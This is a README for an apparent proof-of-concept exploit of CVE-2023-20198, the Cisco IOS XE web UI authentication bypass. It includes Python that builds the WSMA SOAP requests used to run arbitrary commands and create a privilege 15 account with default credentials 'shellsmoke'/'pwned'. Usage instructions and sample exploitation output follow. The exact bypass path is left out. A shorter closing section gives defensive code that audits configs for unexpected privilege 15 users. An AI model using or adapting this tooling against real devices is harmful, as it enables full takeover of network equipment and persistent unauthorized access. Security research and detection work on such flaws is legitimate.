# CVE-2023-20198
Exploit PoC for CVE-2023-20198

## Description
CVE-2023-20198 is an authentication bypass in the Cisco IOS XE web UI: improper path validation lets a request get past the Nginx filtering in front of the web UI and reach the `webui_wsma_http` endpoint without authenticating.<br>
Once that endpoint is reachable, an attacker can execute arbitrary Cisco IOS XE commands or apply configuration changes at privilege level 15.<br>
Cisco's investigation into active exploitation of the then-undisclosed vulnerability found that threat actors first exploited CVE-2023-20198 to add a new privilege 15 user, then exploited CVE-2023-20273 to escalate to the underlying Linux `root` user and install an implant.<br>

This PoC uses CVE-2023-20198 to reach two WSMA SOAP services behind `webui_wsma_http`:<br>
The vulnerability check (`-c`), config dump (`-g`) and command execution (`-e`) options all send a `cisco:wsma-exec` request with the command placed inside its `execCLI` element.<br>
The add user option (`-a`) sends a `cisco:wsma-config` request that applies a configuration change and creates the privilege 15 account. The same service could be (ab)used to make any other configuration change, but that is outside the scope of this PoC.<br>

The `cisco:wsma-exec` request is based on the nuclei template.<br>
The `cisco:wsma-config` request is based on the horizon3ai PoC.<br>
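The two request types described above, written out as code. This is an added example for this README, not the PoC's own code and not the nuclei or horizon3ai code it was derived from. It assumes Cisco's WSMA request layout (an exec request carries the command in `execCLI`/`cmd`; a config request carries CLI lines in `configApply`/`config-data`/`cli-config-data-block`) and assumes the exec response returns CLI output in `dialogueLog`/`received`; the sample response in it is constructed, not captured from a device. The URL path that gets past the Nginx filter to `webui_wsma_http` is not on this page and is not reproduced here, so `send()` takes the full URL from the caller.

```python
"""Build the two WSMA SOAP requests this PoC sends and parse an exec reply.

Added example for this README, not the PoC's code. Assumed: Cisco's WSMA
layout (exec command in execCLI/cmd; config lines in
configApply/config-data/cli-config-data-block) and an exec response that
carries CLI output in dialogueLog/received. The path that evades the Nginx
filter is not reproduced; send() takes the full URL from the caller.
"""
import urllib.request
import uuid
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WSSE_NS = "http://schemas.xmlsoap.org/ws/2002/04/secext"
EXEC_NS = "urn:cisco:wsma-exec"
CONFIG_NS = "urn:cisco:wsma-config"


def _envelope(body: str) -> str:
    # The schema wants a UsernameToken; its values are irrelevant once the
    # request reaches webui_wsma_http unauthenticated via CVE-2023-20198.
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<SOAP:Envelope xmlns:SOAP="{SOAP_NS}"><SOAP:Header>'
        f'<wsse:Security xmlns:wsse="{WSSE_NS}"><wsse:UsernameToken>'
        "<wsse:Username>x</wsse:Username><wsse:Password>x</wsse:Password>"
        "</wsse:UsernameToken></wsse:Security></SOAP:Header>"
        f"<SOAP:Body>{body}</SOAP:Body></SOAP:Envelope>"
    )


def exec_request(command: str, correlator: Optional[str] = None) -> str:
    """cisco:wsma-exec: run one exec-mode command (what -c, -g and -e send)."""
    correlator = correlator or uuid.uuid4().hex
    return _envelope(
        f'<request xmlns="{EXEC_NS}" correlator="{correlator}">'
        '<execCLI maxWait="PT100S" xsd="false">'
        f"<cmd>{escape(command)}</cmd>"  # '<', '>' and '&' must survive as text
        "</execCLI></request>"
    )


def config_request(cli_lines: List[str], correlator: Optional[str] = None) -> str:
    """cisco:wsma-config: apply CLI lines straight to the running config."""
    correlator = correlator or uuid.uuid4().hex
    block = escape("\n".join(cli_lines))
    return _envelope(
        f'<request xmlns="{CONFIG_NS}" correlator="{correlator}">'
        '<configApply details="all"><config-data><cli-config-data-block>'
        f"{block}</cli-config-data-block></config-data></configApply></request>"
    )


def add_user_request(username: str, password: str) -> str:
    """What -a sends: a local privilege 15 account."""
    return config_request([f"username {username} privilege 15 secret {password}"])


def del_user_request(username: str) -> str:
    """What -d sends: remove that account again."""
    return config_request([f"no username {username}"])


def parse_exec_response(xml_text: str) -> Tuple[bool, str]:
    """(success, cli_output) from a wsma-exec reply; (False, '') if none present."""
    resp = ET.fromstring(xml_text).find(f".//{{{EXEC_NS}}}response")
    if resp is None:
        return False, ""
    out = "".join(el.text or "" for el in resp.iter(f"{{{EXEC_NS}}}received"))
    return resp.get("success") == "1", out.strip()


def send(url: str, envelope: str, timeout: float = 15.0) -> str:
    """POST one envelope; the caller supplies the full URL (not called offline)."""
    req = urllib.request.Request(
        url, data=envelope.encode(), method="POST",
        headers={"Content-Type": "text/xml", "Accept": "*/*"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as r:
        return r.read().decode(errors="replace")


# Constructed sample reply in the assumed layout; not captured from a device.
SAMPLE_RESPONSE = (
    f'<SOAP:Envelope xmlns:SOAP="{SOAP_NS}"><SOAP:Body>'
    f'<response xmlns="{EXEC_NS}" correlator="c1" success="1"><execLog>'
    "<dialogueLog><sent>show version</sent><received>\n"
    "Cisco IOS XE Software, Version 16.06.05\n"
    "Cisco IOS Software [Everest], Catalyst L3 Switch Software, Version 16.6.5\n"
    "</received></dialogueLog></execLog></response></SOAP:Body></SOAP:Envelope>"
)

if __name__ == "__main__":
    print(exec_request("show version", "c1"))
    print(add_user_request("shellsmoke", "pwned"))
    print(parse_exec_response(SAMPLE_RESPONSE))
```

`exec_request` is the `-e` path, `add_user_request` and `del_user_request` are `-a` and `-d`; the command is XML-escaped so a pipe filter such as `sh run | i <x>` cannot break the envelope, and the correlator is a fresh UUID per request so replies can be matched to what was sent.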

Note: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.

## Usage
```
usage: [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]

CVE-2023-20198 Exploit PoC

  -h, --help      show this help message and exit
  -t targetIP     Target IP Address
  -l targetFile   File containing IP Addresses (-c only)
  -https          Use https
  -c              [X] Check for vulnerability
  -g              [X] Get Cisco IOS running config
  -e command      [X] Execute Cisco IOS command
  -a              [X] Add new priv 15 user
  -d              [X] Remove priv 15 user
  -u newUserName  [Optional] user name for -a or -d. Default: shellsmoke
  -p newUserPass  [Optional] new user pass for -a. Default: pwned
  -o outputFile   Write output to file
  -v              Increase verbosity
```

### Vulnerability check
To check for CVE-2023-20198, `-c` attempts to exploit the vulnerability by executing `uname -a` and reports whether the target returned output:

```
# ./ -t -c

Testing for vulnerability
Target IP:
Target URL:
Vulnerable:     True
IOS Ver:        <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)
```

### Get Cisco Config
The `-g` option executes `sh run` to pull the running config:

```
# ./ -t -g

Building configuration...
Current configuration : 6988 bytes
version 16.6
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
```

### Execute commands
Arbitrary Cisco IOS commands can be executed with the `-e` option.<br>
Use extreme caution if you use this to make configuration changes: there is no input validation, and changes are applied immediately to the running config.

```
# ./ -t -e 'sh log'

Selected Target:
Running in Exec Mode
Executing Command:      sh log

Sending exploit to target URL:

Syslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)
No Active Message Discriminator.
No Inactive Message Discriminator.
    Console logging: level debugging, 5368 messages logged, xml disabled,
                     filtering disabled
```

### Add user
The `-a` option creates a new privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively. The config change produces no command output, so confirm it with `-v` or by pulling the running config with `-g`:

```
# ./ -t -a -u shellsmoke -p pwned

Selected Target:
Adding New Privilege 15 User
New User Name:  shellsmoke
New User Pass:  pwned

Sending exploit to target URL:

No reportable output from adding users
Check verbose output or get running config
```

### Del user
The `-d` option removes a user account from the device, using the name given with `-u` (default `shellsmoke`).<br>
Make sure you are not deleting a legitimate account.<br>
This option exists for engagements where shell or web UI access to an exploited device cannot be obtained: adding a privilege 15 user this way was observed not to grant web UI access, so without `-d` there would be no way to remove the account, leaving exploitation artifacts on the host.<br>
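The cleanup concern above has a defender's counterpart: the account that `-a` creates (or the one the attackers Cisco described created) appears as a `username ... privilege 15` line in the running config that `-g` pulls back. The following is an added example, not part of the PoC, that audits that text for privilege 15 accounts not on an allowlist and reports whether the web UI's HTTP server lines, which is what serves the web UI this PoC targets, are present. The running-config sample in it is constructed, and the allowlist is something you would maintain yourself.

```python
"""Audit IOS XE running-config text for the kind of account this PoC adds.

Added example, not part of the PoC. It consumes the text the -g option pulls
back (show run): lists local privilege 15 accounts, flags those missing from
an allowlist you maintain, and reports whether the HTTP server lines that
serve the web UI are configured. SAMPLE_RUNNING_CONFIG is constructed.
"""
import re
from typing import Dict, Iterable, List

# username <name> privilege <n> {secret|password} ...
USERNAME_RE = re.compile(r"^username\s+(\S+)\s+privilege\s+(\d+)\b")

# Constructed sample; the hashes are placeholders, not real credentials.
SAMPLE_RUNNING_CONFIG = """\
Building configuration...
Current configuration : 6988 bytes
version 16.6
no service pad
username netadmin privilege 15 secret 9 $9$constructedhash
username shellsmoke privilege 15 secret 5 $1$constructedhash
username helpdesk privilege 1 password 7 0822455D0A16
ip http server
ip http secure-server
"""


def privilege15_users(config_text: str) -> List[str]:
    """Local usernames configured with privilege 15, in config order."""
    users = []
    for line in config_text.splitlines():
        m = USERNAME_RE.match(line.strip())
        if m and int(m.group(2)) == 15:
            users.append(m.group(1))
    return users


def unexpected_priv15(config_text: str, allowlist: Iterable[str]) -> List[str]:
    """Privilege 15 accounts that nobody on the team put there."""
    allowed = set(allowlist)
    return [u for u in privilege15_users(config_text) if u not in allowed]


def web_ui_exposure(config_text: str) -> Dict[str, bool]:
    """Which HTTP server lines are active (exact match, so 'no ip http server' does not count)."""
    lines = {l.strip() for l in config_text.splitlines()}
    return {
        "ip http server": "ip http server" in lines,
        "ip http secure-server": "ip http secure-server" in lines,
    }


if __name__ == "__main__":
    print(privilege15_users(SAMPLE_RUNNING_CONFIG))
    print(unexpected_priv15(SAMPLE_RUNNING_CONFIG, {"netadmin"}))
    print(web_ui_exposure(SAMPLE_RUNNING_CONFIG))
```

Run it over the output of `-g` (or a `show running-config` taken over the console) rather than trusting the device's web UI, since the account you are looking for was added without ever touching it.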

## References
- Cisco Advisory
- horizon3ai CVE-2023-20198 research
- horizon3ai CVE-2023-20198 PoC
- nuclei CVE-2023-20198 template (Authors: iamnoooob, rootxharsh, pdresearch)
- LeakIX CVE-2023-20273 PoC

## TODO
- [ ] https support
- [ ] CVE-2023-20273 implementation
- [ ] Timeout and error handling

## Disclaimer
The code contained in this project is intended only for research and usage on systems where the user has explicit authorization.<br>
The author of this project is not responsible or liable for misuse of the software.<br>
Use responsibly and don't be evil